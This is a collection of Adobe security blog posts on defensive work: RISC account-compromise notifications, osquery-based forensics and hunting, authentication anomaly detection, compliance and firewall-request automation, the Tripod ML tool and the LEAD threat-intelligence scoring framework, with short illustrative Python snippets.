Ongoing Research – Security @ Adobe

Adobe Supports OpenID RISC Integration with Google Social Authentication


Today is Safer Internet Day, and the slogan is, “together for a better Internet,” calling for stakeholders to join forces and help create a safer Internet. Thus, we wanted to share the details of our recent efforts with Google. Adobe and Google are working together to develop and implement the OpenID Risk and Incident Sharing and Coordination (RISC) specifications to help protect our users. One of the key objectives of the OpenID RISC working group is to develop standards designed to protect third-party accounts (such as Google Social authentication) when they are used to sign in to other services (also known as “social sign-on” or “SSO”).

Adobe supports multiple third-party SSO authentication methods through its identity management services, including Google Social authentication, for several of its products, including Adobe Creative Cloud.

This collaboration enables sharing of real-time security notifications that can help proactively protect Adobe user data if another SSO provider, like Google, experiences a security incident impacting their user accounts. This enablement is just one example of the ongoing efforts Adobe is undertaking with our industry partners and the broader security community to better protect Adobe users and their data.

Prior to this effort, if a third-party account, such as a Google Social account, was in jeopardy, all services that allowed users to sign in with that third-party SSO credential could remain vulnerable until they were notified by the third-party provider. OpenID RISC is a standards-based effort that aims to reduce this risk by providing connected services (like Adobe) with immediate notifications from third-party SSO providers about compromised accounts. This helps companies like Adobe quickly address the reported issue and secure their users’ accounts and data.

In support of OpenID RISC, Adobe updated its SSO authentication integration to enable real-time notifications from Google Social authentication services, demonstrating its commitment to enhanced user account protection. With this integration, Adobe receives notifications of major changes to Google accounts (e.g., session revocations, account disablement) and acts to secure the user’s account (e.g., ending currently open sessions).
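To make the mechanics more concrete, here is a minimal sketch of how a receiving service might process a RISC Security Event Token (SET). The event-type URIs below come from the OpenID RISC event profile; the key handling, audience value, and response actions are illustrative placeholders rather than Adobe's actual implementation.

import jwt  # PyJWT

SESSIONS_REVOKED = "https://schemas.openid.net/secevent/risc/event-type/sessions-revoked"
ACCOUNT_DISABLED = "https://schemas.openid.net/secevent/risc/event-type/account-disabled"

def handle_risc_set(set_token, issuer_key, expected_audience):
    # A SET is a signed JWT: verify the signature and audience before acting on it.
    claims = jwt.decode(set_token, issuer_key,
                        algorithms=["RS256"], audience=expected_audience)
    # The "events" claim maps event-type URIs to event payloads about a subject.
    for event_type, payload in claims.get("events", {}).items():
        subject = payload.get("subject", {})
        if event_type == SESSIONS_REVOKED:
            print("ending open sessions for", subject)       # stand-in for real session teardown
        elif event_type == ACCOUNT_DISABLED:
            print("suspending linked account for", subject)  # stand-in for account suspension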

Adobe is committed to continuing its work with the OpenID RISC working group on this standard and promoting it as a solution for more secure integration with third-party identity providers. Adobe’s work with industry partners like Google helps us provide a more seamless user experience while helping protect our users’ accounts as part of our continuous efforts to improve the overall security of our products and services.

John Trammel
Principal Scientist, Identity Services

Cristian Aurel Opincaru
Manager, Software Development, Identity Services


Digital Forensics and Incident Response Using OSQuery


Understanding the anatomy of a potential incident can be one of the most challenging tasks that an incident response team faces, especially in the increasingly complex cloud computing environments most organizations have today. But even the most sophisticated hacker can leave behind footprints that can help incident responders piece together what happened and try to prevent a repeat. While using a forensics tool to extract artifacts from endpoint memory is typically the most comprehensive method of reconstructing a potential incident, it’s also the most time- and resource-intensive. And when responding to a security incident, time is of the essence, particularly with the increasingly stringent data protection requirements set by numerous government regulations and industry standards.

Detecting and containing a security incident is no easy feat in the simplest of network architectures, and the more complex the network, the more difficult detection becomes. Dwell time (the time between initial compromise and detection) can vary from a few hours to several months.

To improve overall data security and minimize the risk of security incidents, organizations need to implement a proactive threat detection plan in addition to a reactive incident response activity. But where to start? It is often like searching for the proverbial needle in a haystack, but certain categories of artifacts can provide the initial insights and can be extremely relevant when performing a live disk analysis of an endpoint.

Generally, the time and resources required to gather and analyze relevant artifacts from multiple machines across an enterprise simply don’t scale in large cloud computing environments. To address this scalability problem, the Adobe security team is working on a new approach to digital forensics and incident response (DFIR) that’s quick and cost-effective, based on OSQuery – an open source tool that you might already have in your endpoint monitoring toolkit.

The OSQuery framework exposes the operating system of an endpoint as a relational database, against which you can run standard SQL queries to find specific artifacts about the system, such as running processes, logged-in users, open network sockets, bash history, listening ports, process trees, and even Docker containers. Each artifact type gets its own table within the database. Because it uses industry-standard SQL, the query language employed by OSQuery is generic across operating system platforms. While this is a huge plus, don’t mistake it for an alternative to using a real-time response EDR tool.

OSQuery is well-suited to two fundamental DFIR use cases, each of which organizations likely encounter every day. The first use case focuses on forensic data collection for analysis and large-scale threat detection across the enterprise. In this scenario, organizations run OSQuery in interactive mode (osqueryi) from the command line and use ad-hoc SQL queries to collect data during a forensic investigation. For example, suppose you suspect that an endpoint has been infected, but you don’t want to launch your full forensics tool right away, or you’re hesitant to run an artifact-collection script on a compromised endpoint. Instead, you can create a set of queries in OSQuery that are tuned for a forensic investigation and collect the relevant artifacts from that particular endpoint – from broad queries that return all running processes or new services installed as scheduled jobs, to more granular searches that detect what may have been loaded by a specific malicious process. Interactive mode is also useful for testing queries before large-scale deployment.
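As a rough illustration, the same ad-hoc collection can be scripted by shelling out to osqueryi and reading its JSON output. The table and column names below come from osquery's standard schema; the wrapper itself is only a sketch, not Adobe's tooling.

import json
import subprocess

# A few common forensic artifacts, expressed as standard SQL against osquery tables.
QUERIES = {
    "logged_in_users": "SELECT user, host, time FROM logged_in_users;",
    "listening_ports": "SELECT pid, port, protocol, address FROM listening_ports;",
    "processes":       "SELECT pid, name, path, cmdline FROM processes;",
}

def run_query(sql):
    # osqueryi --json prints the result set as a JSON array of row objects.
    out = subprocess.run(["osqueryi", "--json", sql],
                         capture_output=True, text=True, check=True)
    return json.loads(out.stdout)

for name, sql in QUERIES.items():
    rows = run_query(sql)
    print(f"{name}: {len(rows)} rows collected")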

Alternatively, OSQuery is also extremely useful for threat hunting in your enterprise. In this scenario, you install OSQuery as a service (or in daemon mode) and run scheduled queries for periodic data collection. This enables you to determine baseline behavior and then identify outliers that might indicate a potential security threat. Daemon mode, osqueryd, is used for large-scale deployment of queries across your enterprise after you’ve tested them in osqueryi.
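For the daemon-mode case, queries are defined in osqueryd's JSON configuration under a "schedule" key. The snippet below writes such a schedule from Python; the query names and one-hour interval are illustrative choices, not a recommended baseline.

import json

# Two example scheduled queries following osquery's documented config layout.
config = {
    "schedule": {
        "new_listening_ports": {
            "query": "SELECT pid, port, protocol, address FROM listening_ports;",
            "interval": 3600,  # run every hour
        },
        "crontab_entries": {
            "query": "SELECT command, path FROM crontab;",
            "interval": 3600,
        },
    }
}

with open("osquery.conf", "w") as fh:
    json.dump(config, fh, indent=2)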

The high-level architecture of deployment is shown in the figures below: (1) the osquery agent checks in, (2) the TLS endpoint responds with a query, and (3) osquery replies with the results.

Fleet from Kolide is an open-source query manager through which queries can be deployed via query packs and run across your fleet. The output can be sent to a SIEM or log aggregation platform for further investigation and/or threat hunting.

OSQuery architecture

Using Kolide

Let’s talk about a potential attack scenario involving malicious cryptomining.

The attacker compromises an instance using stolen or default credentials. The attacker then creates a new user account, deletes the legitimate users, and blocks legitimate access. At this point, the attacker might spin up more instances. Eventually the attacker installs and starts the miner, which establishes a connection to its mining pool. The attacker might also establish persistence and propagate laterally in the network.
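A couple of illustrative hunt queries for this scenario might look for recently added local accounts and for processes holding unexpected outbound connections (a miner keeps a long-lived connection to its pool). The port filter and table choices below are examples, not actual production detections.

import json
import subprocess

HUNT_QUERIES = {
    # Local accounts - the attacker adds a new user and removes legitimate ones.
    "local_users": "SELECT uid, username, shell FROM users;",
    # Processes with outbound sockets on non-web ports - candidate miner/pool traffic.
    "outbound_sockets": (
        "SELECT p.name, p.cmdline, s.remote_address, s.remote_port "
        "FROM process_open_sockets s JOIN processes p USING (pid) "
        "WHERE s.remote_port NOT IN (80, 443) AND s.remote_address != '';"
    ),
}

for name, sql in HUNT_QUERIES.items():
    out = subprocess.run(["osqueryi", "--json", sql],
                         capture_output=True, text=True, check=True)
    print(name, json.loads(out.stdout))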

Here’s the scenario that we emulated in our sandbox environment.

Sandbox scenario

The detection mechanism in SIEM:

Example in SIEM

While I’ve only touched on its capabilities at a high level, OSQuery can be an ideal solution to help incident response teams work quickly and at the necessary scale when a security incident occurs. Even the stealthiest attacker can leave behind footprints—and the quicker and more accurately you can detect and analyze these footprints, the faster you can determine the scope of the threat and work to contain it.

For more information on Adobe’s scalable approach to DFIR using OSQuery, watch this webinar.

Sohini Mukherjee
Security Analyst, Adobe Security Coordination Center (SCC)

Andres Martinson
Sr. Security Engineer, Experience Cloud

 

Using User Behavior Analytics to Detect Authentication Anomalies


You may think detecting user authentication anomalies is as simple as identifying a red egg in a carton of white ones, but it’s nowhere near that easy. On the other hand, it’s not impossible, especially when you implement user behavior analytics (UBA). In a nutshell, UBA helps detect anomalies in user behavior through a combination of data science, machine learning (ML) algorithms, and AI. When integrated into a company’s overall security procedures, UBA can help security professionals proactively detect potential perimeter issues, suspicious lateral movement, possible insider threats, and other anomalies that may be malicious. At a higher level, UBA enables you to simultaneously strengthen your proactive security efforts and enhance your defensive security solutions. For example, using ML and AI, you can identify activity that, if allowed to continue unabated, might become a full-blown security incident.

Here at Adobe, the Security Intelligence team uses UBA to perform daily anomaly detection in our user authentication logs, which are generated by Okta. We use a custom portal — the Identity & Access Management (IAM) Portal — to track user interactions and alerts, and we take user feedback into account when weighting anomalies. We added functionality to the IAM portal so users can view their own historical data about their anomalies and how they’ve responded to them. This direct involvement makes it easier for users to see how they are adding value to what we are doing behind the scenes. Plus, most users want to do the right thing security-wise, but they’re often unaware of what the best practice is or they’re making honest mistakes. Engaging users and making them aware of how their activities might directly affect what could be identified as an anomaly is an important part of this process.

So, based on user feedback about whether an anomaly is legitimate or malicious, we can adjust the model to weight features appropriately: either that the activity is no longer considered anomalous and we should treat it differently the next time it appears, or that it should be escalated to another team for analysis using an automated workflow. Being able to close the loop and bring the user into the process helps eliminate false positives and improves our overall security efforts.

Now let’s dig deeper into the technical aspects of the anomaly detection and alerts workflow we use at Adobe:

The first step is to pull the logs of all successful authentications in the last 24 hours and filter them according to employee type. This is accomplished via an API call to Okta, which provides a robust, valuable data set that helps us understand what the authentication process or the session might look like for a user. Details about geography, applications they’ve accessed, IP addresses, and such make it easy to come up with a strong methodology for analyzing those events.
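A simplified sketch of that collection step is shown below. The org URL, token handling, and filter expression are illustrative (and pagination is omitted); the real pipeline handles these details.

import datetime
import os
import requests

OKTA_LOG_URL = "https://example.okta.com/api/v1/logs"   # hypothetical Okta org URL
HEADERS = {"Authorization": f"SSWS {os.environ['OKTA_API_TOKEN']}"}

since = (datetime.datetime.utcnow() - datetime.timedelta(hours=24)).isoformat() + "Z"
params = {
    "since": since,
    "filter": 'outcome.result eq "SUCCESS"',   # successful authentications only
    "limit": 1000,
}

resp = requests.get(OKTA_LOG_URL, headers=HEADERS, params=params)
resp.raise_for_status()
events = resp.json()
# Each event carries actor, client.ipAddress, client.userAgent, client.geographicalContext,
# and the target application - the "features" referenced in the next step.
print(len(events), "successful authentications in the last 24 hours")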

Then, we note the features – or detail data – for each successful authentication and add these, along with the Okta logs, to a MongoDB database.

Step 1: Gather Okta logs and groom features of successful authentications

Next, we append the Okta data from the past 24 hours to the last six months of historical Okta data for a user in the MongoDB database and run a machine learning algorithm against those data sets, using User Agent String (UAS), country, and app as features. We then use statistical calculations to check whether the country in the anomaly is the least-count country for the user, or whether the UAS is the least-count UAS, and we also use travel data to account for international business travel and remove false positives. These anomalies are then added to the MongoDB database. This step in the workflow typically takes 30 minutes to two hours, with an average runtime of one hour.
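Below is a small sketch of the “least count” idea described above: flag an authentication when its country or user-agent string is the rarest (or a brand-new) value for that user over the historical window. The field names and the toy history are illustrative.

from collections import Counter

def least_count_flags(history, event):
    # history: past auth records for one user; event: the authentication being scored.
    country_counts = Counter(h["country"] for h in history)
    uas_counts = Counter(h["user_agent"] for h in history)

    def is_least_count(counts, value):
        if value not in counts:
            return True  # never seen for this user
        return counts[value] == min(counts.values())

    return {
        "country_anomaly": is_least_count(country_counts, event["country"]),
        "uas_anomaly": is_least_count(uas_counts, event["user_agent"]),
    }

history = [{"country": "US", "user_agent": "Chrome/120 macOS"}] * 40 \
        + [{"country": "IN", "user_agent": "Chrome/120 macOS"}]
print(least_count_flags(history, {"country": "IN", "user_agent": "Firefox/121 Linux"}))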

Step 2: Identify anomalies and remove false positives

Now comes the process of alerting the user and getting their feedback. The IAM team pulls all the anomalies from the past 24 hours out of the MongoDB database and sends an email to each user listing every anomaly associated with their username. The user then logs into the IAM portal and either confirms or denies the anomaly, and MongoDB is updated with the user’s response. If the user responds that they recognize the login and that it’s legitimate, future anomalies with the same parameters will not be escalated to the user for the next two weeks. If the user responds otherwise, the anomaly is automatically escalated to the Adobe SCC in the workflow execution. And if the user responds with NOT SURE, the alert is assessed for compromise or better classification by the Security Intelligence team.

Step 3: Alert user and update MongoDB

Now let’s look at some examples of user authentication activities that would trigger various levels of anomalies:

High Severity

  • User travels to a different country and uses new device/browser
  • User attempts to log in from a blacklisted country or using a blacklisted UAS

Medium Severity

  • User travels to a different country and uses existing device/browser
  • User logs in from a new device/browser even if in their home country

It is important to note that just because an anomaly is flagged as “high severity” does not mean that it is malicious.

Since implementing UBA within Adobe, we’ve seen a number of business benefits, not the least of which is that our user community is now engaged in the security process. Our password policy now more closely mirrors the latest NIST standards, ending arbitrary password rotation and improving overall security. We have greater visibility into business processes and possible security policy violations, such as an attempt to automate the authentication process using a workflow that hasn’t undergone a security review. We’ve been able to identify a number of previously undetected malicious activities, and we’ve improved other authentication workflows by applying the UBA results, including adaptive authentication based on user/device risk and history.

In conclusion, this project has helped us at Adobe gain valuable insight into possible user behavior anomalies, how to detect them, and how to avoid issues that could trigger a needless reaction. First, sometimes the results of our analytics simply reflected unexpected or poor work processes or policy issues rather than truly malicious activity. Second, ensuring automated and repeatable results takes time. And finally, occasionally legitimate activity will trigger an alert and it’s important to determine, as a company, your acceptable rate of false alarms.

Aron Anderson
Lead, Enterprise Security

Ashwini Cheerla
Security Engineer

Automating the Common Controls Framework


Over the past several years, the Adobe Technology Governance, Risk and Compliance (GRC) team has developed and implemented the Common Controls Framework (CCF). The CCF helps various cloud products, services, platforms, and operations achieve and maintain compliance with various security certifications, standards, and regulations such as SOC 2, ISO, PCI, FedRAMP, and others. The CCF is a foundational framework and backbone to our company-wide security compliance strategy. Not only does it provide the flexibility to quickly adapt to and tackle new certification requirements, but it also helps heighten our information security posture. A few years ago, through our ongoing efforts to support the broader security community, we open-sourced CCF so customers and peers can leverage it to help meet their goals.

The Next Level

As Adobe’s products, services, and platforms grow and expand, CCF must also mature and scale at the same pace. To help enable this scalability, the Adobe Technology GRC team is developing a controls automation platform. This will help CCF mature further while reducing the amount of manual effort needed for the implementation and ongoing maintenance of controls.

In addition, the CCF automation platform will be able to check the operating effectiveness of controls on a near real-time basis. It will also provide immediate alerting and remediation tracking to the owners of the controls. The automated CCF checks and alerts will help enable us to identify potential issues early in the audit cycle – helping to reduce the potential risk associated with control failures.

This CCF automation platform will also include a dashboard that provides Adobe control owners with a comprehensive view of the state of effectiveness of CCF controls, along with all the upcoming activities that must be completed to maintain the operating effectiveness of the controls.

Scalability

Implementing CCF and managing the framework across Adobe requires working with a growing footprint of services spanning multiple clouds. We also must help these services maintain continuous operational effectiveness of controls. The current process requires that the cloud operations and engineering teams perform periodic compliance validation activities, along with manual extraction of audit evidence/artifacts (e.g., access reviews, business impact assessments, etc.). They then must retain these manual reports to demonstrate the controls’ operating effectiveness. Together these activities can be very time consuming and lack the desired operational efficiency.

The CCF automation platform ingests the logs directly from source systems and performs automated checks against them, thereby reducing the manual effort required by teams. This will bring significant improvement to the operational efficiency and scalability of Adobe’s ongoing compliance certification and attestation process.

The Platform

The CCF automation platform is built on a layered framework that consists of:

  • Visualization layer
  • Application layer
  • Services layer
  • Data layer

When?

CCF is an ongoing journey with various milestones to be achieved, and a continuous pursuit for enhancements. The automation platform is the next level of organic maturity for CCF. Over the next few quarters, we plan to implement and deliver the CCF automation platform for Adobe in a phased manner over multiple releases. Stay tuned for further updates.

Prasant Vadlamudi
Director, Technology GRC

Automating Secure Firewall Change Requests


As many companies transform to multi-cloud environments, managing firewall changes at the speed of development teams can be challenging. Teams across Adobe are constantly evolving cloud services to continue to delight our customers. But one of the major challenges is helping to ensure that the firewall change requests supporting their work happen efficiently and securely. We receive hundreds of requests each month for access to services. However, manually reviewing each one can be a time-consuming process that comes with the risk of human error. We set out to mitigate this potential risk by automating as much of the process as possible.

Defining Requirements and Initial Testing

We started by assigning different levels of risk to various protocols and common design patterns. We knew we needed to automate identification of these protocols and design patterns as well as identify what kind of connections should or should not be permitted based on risk tolerance.

We used Microsoft’s STRIDE threat model to help identify the potential risks with certain requests. Examples of these higher risk activities are:

  • When users did not understand their data flows, they might request large port ranges
  • When users did not understand how stateful firewalls work, they might request reverse traffic access (i.e. from server to client)
  • When systems support legacy insecure protocols like FTP for file transfers, users might request these simply because they are listed in the documentation

We also used a risk assessment matrix to measure the total impact and likelihood of possible threats. If the risk of a request is higher than what is permitted by Adobe’s own established risk management standards, the request would not be approved by the tool.

We then developed a framework using Python scripting to meet these requirements. In the initial testing and acceptance phase, all automated decisions were manually reviewed. Once we were able to determine that automated decisions could be reliably accepted, we then deployed this framework for our lowest risk change requests.

Evolving the Framework

The framework is designed to be extendable, so when a new potential risk is identified, it can be folded into the framework quickly. The framework runs on each new change request, and we update it when a new potential risk is identified or when there is a specific set of applications that warrants more oversight. We regularly review the tool’s decisions to help ensure ongoing accuracy as we scale up usage. We also advise requesters when deployment patterns do not fit the automatic approval criteria, encourage them to consider lower-risk options for their deployments, and remind them that any request must meet all established security standards. Here are some examples of best practices the tool looks for in order to expedite approvals, followed by a simplified sketch of how such checks might be automated:

  • Specific source hosts provided
  • Specific destination hosts provided
  • Secure transports only are used (HTTPS, SSH, SFTP)
  • Registered services with matching data classification
  • Well-defined logging and monitoring access
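As a rough illustration only, a rule check along these lines might look like the sketch below. The allowed ports, single-host requirement, and request format are example values, not Adobe's actual approval policy.

import ipaddress

SECURE_PORTS = {443, 22}   # e.g., HTTPS and SSH/SFTP

def auto_approvable(request):
    src = ipaddress.ip_network(request["source"], strict=False)
    dst = ipaddress.ip_network(request["destination"], strict=False)
    # Specific source and destination hosts, not broad subnets.
    if src.num_addresses > 1 or dst.num_addresses > 1:
        return False
    # Secure transports only, and no large port ranges.
    ports = set(request["ports"])
    if len(ports) > 1 or not ports.issubset(SECURE_PORTS):
        return False
    # Anything else (legacy protocols, reverse flows, unregistered services)
    # falls through to manual review.
    return True

print(auto_approvable({"source": "10.0.1.5/32",
                       "destination": "10.0.2.9/32",
                       "ports": [443]}))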

Conclusion

We are still developing and evolving this tool in real time as we gain more knowledge about the patterns in our development teams’ requests. So far, usage of this tool has saved many hours of manual review, improved turnaround time for developers who follow established secure development practices, and helped reduce the overall risk level associated with this very common request in ongoing cloud application development and deployment.

Ben Chinoy
Security Researcher

Jason Joy
Sr. Enterprise Security Engineer

Introducing Tripod: an Open Source Machine Learning Tool


Machine learning (ML) and artificial intelligence (AI) are becoming very useful technologies in cybersecurity. However, before you can model, validate, and visualize security data that will actually be useful, you need to prepare the data properly for input. This can be a difficult and complicated process – something data scientists wrestle with often. More than just traditional data preparation, which includes cleansing the data and de-duping, ML algorithms often require numerical rather than standard text input. The challenge is finding an efficient and accurate way to convert your data to numerical values that can be consumed by the ML model or algorithm.

The Security Intelligence Team within Adobe’s Security Coordination Center uses ML/AI to help more quickly recognize and identify potential threats to Adobe’s infrastructure. In order to keep up with new methods of attack and find potential “needles in the haystack,” we continually run new data models. We also need to make sure that the data prep process is not a hindrance to our efforts.

Tripod is a tool and model for computing latent representations for large sequences. It can be used for several potential applications including:

  • Malicious code detection
  • Sentiment analysis
  • Information/code indexing and retrieval
  • Anomaly detection/unsupervised learning

Tripod automatically computes latent representations of data in code and logs that ML/AI algorithms can use. By implementing three different methodologies—self-attention, global style tokens (GST), and “memory-based” representations—Tripod can more quickly turn traditional text-based data into numerical input that ML/AI algorithms can ingest.

Here are a few examples of how we use Tripod to help in our efforts here at Adobe.

By feeding both “good” JavaScript and “bad” JavaScript code into Tripod, we get a dataset from which we can determine a “classifier” – an attribute that distinguishes the malicious code – which we use to “train” the ML algorithm. Without Tripod, this process can be time-consuming and tedious.
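To show only the downstream half of that workflow, the sketch below assumes Tripod has already turned each JavaScript sample into a fixed-length numeric vector (here read from a hypothetical CSV whose last column is the label) and trains a simple classifier on it. This is not Tripod's own API, just an illustration of consuming its output.

import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

# Hypothetical export: one row per sample, feature columns followed by a 0/1 label.
data = np.genfromtxt("tripod_vectors.csv", delimiter=",", skip_header=1)
X, y = data[:, :-1], data[:, -1]

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
clf = LogisticRegression(max_iter=1000).fit(X_train, y_train)
print("held-out accuracy:", clf.score(X_test, y_test))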

Tripod can also help uncover anomalous code, which is one of the most common ways malicious attacks infiltrate systems. After running raw log data through Tripod, we get a vectorized dataset that is easily ingested by the ML algorithm.

Tripod can also assist with log analysis. From a logging perspective, anomalies are events that occur very rarely in a dataset. Malicious events are similar – if infrastructure is well-secured, they are infrequent when compared to mainstream events. The direct approach is to identify the anomalies in a dataset and then search for malicious activities in this subset of data. For log sources that can generate up to several million events each hour, Tripod can help more quickly identify the subset of events that may be worth investigation.

Data is critical to machine learning and the Tripod project can help you get more useful information quickly from complex datasets. Machine learning through tools like Tripod can help you find the answers you need to respond to potential issues and threats more quickly. You can download Tripod for yourself today from Adobe’s GitHub repository.

Tiberiu Boros
Data Scientist & Machine Learning Engineer

Andrei Cotaie
Sr. Security Engineer

Rethinking Threat Intelligence with the LEAD Framework


Threat intelligence has been a key component of our detection process for many years. We created the LEAD threat intelligence framework to help security personnel make sense of the threat intelligence data we collect every day. This framework is based on a unique maturity model that combines machine learning (ML) with automation and security orchestration to better deliver actionable and relevant threat intelligence. What does that really mean?

We broke the threat intelligence process down into four fundamental steps. In each step, the threat intelligence must be:

  1. ReLevant
  2. Efficient
  3. Analyst-driven
  4. Deliverable

Within each step, two elements combine to produce an actionable result. Let’s take a deep dive into each step.

ReLevant

To make threat intelligence relevant, you first need to create a threat profile. A threat profile includes what infrastructure you are trying to defend (e.g., enterprise network, servers, mobile devices, POS systems, and IoT) as well as from whom you are defending that infrastructure. Understanding the potential attackers’ motives is important because the various types of attackers have different degrees of sophistication and ability to mount complex attacks. For example, attacks from script kiddies and scammers are typically not very complex, but those from more advanced actors can be moderately to highly complex. The attacker type then informs which threat intelligence feeds and sources to ingest. Likewise, the infrastructure you are trying to defend also helps you pinpoint relevant threat intelligence feeds and define specific filters for them.

Now that you have your threat profile, you need to define the threat intelligence program requirements. You can think of this as defining what threats you’re potentially facing and what tools you need to help combat these threats.

To help do this, we created a unique threat intelligence maturity model, which maps to the most common maturity model levels used in the cybersecurity industry. This commonality enables fluid transition to the LEAD framework from other maturity models or frameworks.

Here is a more detailed explanation: 

There are commonly two types of threat intelligence programs: Early Stage programs focus primarily on Indicators of Compromise (IoC), which are the traditional tactical – and often reactive – indicators used in threat detection. In contrast, Mature Stage programs focus on behavioral indicators or Indicators of Attack (IoA), which is a more proactive way of determining the intent of the bad actors.

Once you’ve defined whether you have an early or mature stage threat intelligence program, you can make better decisions about securing the right tools for your program, helping ensure that you invest in the tools that will support your program rather than wasting money on a tool that looks sexy but doesn’t solve the problems you face in your stage. For example, an early stage program will detect cyber-threats using atomic indicators (e.g., IP addresses, file hashes, email addresses, URL addresses) in an automated manner. These indicators will come from threat intelligence sharing groups or OSINT (open source intelligence), and the data needs to be in a standardized format in order for the automation to be efficient. Which leads me to the second step.

Efficient

The second step in the LEAD framework is focused on making your threat intelligence efficient. How do you do that? You score and categorize the data.

The LEAD framework uses a scoring matrix that includes five different properties to assist in determining the importance of each piece of data:

  1. Indicator Type – This is the information that tells you where the attack is coming from: IP address, domain name, file path, email address, URL, or file hash.
  2. Threat Intelligence (TI) Source or Feed – The reliability and accuracy of TI data is often related to the source of the threat, whether that’s OSINT, TI sharing groups, paid vendors, or internal threat intelligence.
  3. Threat Source (a.k.a, The Adversary) – Some threat actors and malware families target specific sectors and infrastructure, which makes them rate higher on the threat scale. These sources include script kiddies, scammers, hacktivists, organized crimes, and nation/state sponsors.
  4. Threat Context – One of the most important factors influencing the score, threat context describes how the attack or threat is being carried out. For example, is it a malware threat, a MITRE ATT&CK technique, a SQL injection, or a cyber kill chain phase? Context is also commonly known as TTPs: tactics, techniques, and procedures.
  5. Data Retention – Is the threat intel data historical or new?

Here is an example of a basic threat profile:

Indicator: 1.1.1.1
Indicator Type: IP Address
Threat Intelligence Source: OSINT (Open source intelligence)
Threat Context: Targets macOS, targets only EU companies, communicates over port 80, used only for exfiltrating data (Cyber Kill Chain phase: Exfiltration)
Data Retention: Last used two months ago

We then use this information to assign a positive or negative score to each property based on the overall threat profile. So, for the above example, the threat score might look like this:

Indicator Type:

  IP                 +1
  Domain             +2
  File Hash          +2
  Credit card data   +3
  Email              +3

TI Data Source:

  OSINT              +1
  TI sharing         +1
  Paid feed          +2
  Internal TI        +3

Threat Attribution:

  Organized crime    +3
  Scammers           +2

Context:

  Infection Vector – Phishing      +2
  Targeted Sector – E-commerce     +4
  Targeted Region – Europe         +4
  Targeted OS – Windows            +2

Data Retention:

  Indicators last seen < 3 months  +2
  Indicators last seen > 3 months  -2
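A simplified illustration of how these weights combine is shown below: each property value maps to a weight, and an indicator's score is the sum of the weights that apply. The weight table mirrors the example values above and is illustrative, not prescriptive.

WEIGHTS = {
    "indicator_type": {"ip": 1, "domain": 2, "file_hash": 2, "credit_card": 3, "email": 3},
    "ti_source":      {"osint": 1, "ti_sharing": 1, "paid_feed": 2, "internal": 3},
    "attribution":    {"organized_crime": 3, "scammers": 2},
    "context":        {"phishing": 2, "ecommerce": 4, "europe": 4, "windows": 2},
    "retention":      {"recent": 2, "stale": -2},
}

def score(indicator):
    total = 0
    for prop, value in indicator.items():
        values = value if isinstance(value, list) else [value]  # e.g. several context tags
        total += sum(WEIGHTS[prop].get(v, 0) for v in values)
    return total

# The 1.1.1.1 example above: an IP from OSINT, targeting Europe, last seen two months ago.
example = {"indicator_type": "ip", "ti_source": "osint",
           "context": ["europe"], "retention": "recent"}
print(score(example))  # 1 + 1 + 4 + 2 = 8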

Once scored, each threat is then categorized by use case and stakeholder. This helps determine the threat level and whether the threat is currently active, expired, or has previously resulted in a false positive. In this example, incoming IP traffic from OSINT that is older than three months will have a lower score than a threat to credit card information from e-commerce companies that you found out about from a paid TI source.

Analyst-driven

In this step, threat intelligence becomes dynamic rather than static by using feedback from analysts and other stakeholders to filter, categorize, and re-evaluate the threat intelligence data from both internal and external feeds. Using this analyst feedback loop, the TI data is dynamic or, in other words, self-tuning. To further improve the data, we use machine learning (ML), specifically natural language processing (NLP), to review the analysts’ feedback and create keywords and tags that, with the help of orchestration, feed the data back into the framework and further improve scoring and categorization.

Because the feedback provided by the analysts and/or stakeholders is typically supplied in free text format and with multiple data structures, the LEAD framework uses Machine Learning, specifically Natural Language Processing, to analyze the feedback and extract keywords. These keywords are then used to inform the context property of the scoring matrix above. Based on these attributes, the score of a piece of threat intelligence data will increase or decrease. The entire process requires orchestrating multiple automations, resulting in dynamic, or self-tuning, threat intelligence data.
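One simple way to extract such keywords is a TF-IDF pass over the feedback text; the top-weighted terms can then be mapped onto the context tags used by the scoring matrix. The feedback strings below are made up for illustration, and the real pipeline uses richer NLP than this sketch.

from sklearn.feature_extraction.text import TfidfVectorizer

feedback = [
    "Confirmed phishing landing page targeting our e-commerce checkout",
    "False positive - internal scanner traffic from the Windows fleet",
]

vec = TfidfVectorizer(stop_words="english")
tfidf = vec.fit_transform(feedback)
vocab = vec.get_feature_names_out()

for i, text in enumerate(feedback):
    row = tfidf[i].toarray().ravel()
    top_terms = [vocab[j] for j in row.argsort()[::-1][:5] if row[j] > 0]
    print(text, "->", top_terms)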

Deliverable

Using standardized data formats is important in delivering relevant and actionable TI data most efficiently. Some important factors to consider include:

  • Flexible API — Exposing all TI data attributes through an API helps create a seamless automation process between the TI data and its consumers/stakeholders.
  • STIX 2.0/JSON data structure — Contributing and ingesting TI becomes a lot easier with STIX. All aspects of suspicion, compromise, and attribution can be represented clearly with objects and descriptive relationships. STIX information can be visually represented for an analyst or stored as JSON to be quickly machine-readable. STIX’s openness allows it to be integrated into existing tools and products or tailored to your specific analyst or network needs. A brief example follows.
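For instance, the 1.1.1.1 indicator from the scoring example could be expressed as a STIX object with the stix2 Python library and serialized straight to JSON for downstream consumers (the name and description below are illustrative):

from stix2 import Indicator

indicator = Indicator(
    name="Exfiltration endpoint observed over port 80",
    description="Targets macOS and EU companies; used only for exfiltrating data.",
    indicator_types=["malicious-activity"],
    pattern="[ipv4-addr:value = '1.1.1.1']",
    pattern_type="stix",
)
print(indicator.serialize(pretty=True))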

Metrics

The last step in the LEAD framework generates metrics that help measure the success of the TI program and justify its implementation to management. You should always choose metrics over which you have direct control. While you can’t control the number of threat actors or actual threats you might encounter in a given period, you can control how many services and applications you have that are currently able to collect useful intelligence about possible attacks against them. This keeps focus on a manageable goal (e.g., broad coverage) versus a goal with too many external uncontrollable factors.

In summary, effective metrics should be:

  • Audience-specific
  • Related to how and where TI is used, e.g., did it help prevent or detect a specific threat?
  • Not actor-driven

Conclusion

We created the LEAD threat intelligence framework to help security personnel make sense of the volumes of threat intelligence data we collect every day, aiding the detection of the most critical threats and the speed of remediation. Based on a unique maturity model that combines machine learning with automation and security orchestration, the LEAD framework uses a four-step process to deliver actionable and relevant threat intelligence to our security personnel, helping ensure the security of our infrastructure—and your data.

Filip Stojkovski
Manager, Threat Intelligence

Mapping Your Way Through Application Security Obstacles


As a security researcher, it is always important to stay current and explore new technologies. Graph databases have been around for a while, but I never had a use case to dive into them until recently. This blog series will cover what I learned from a recent exploration of how they can be leveraged for application security within large organizations.

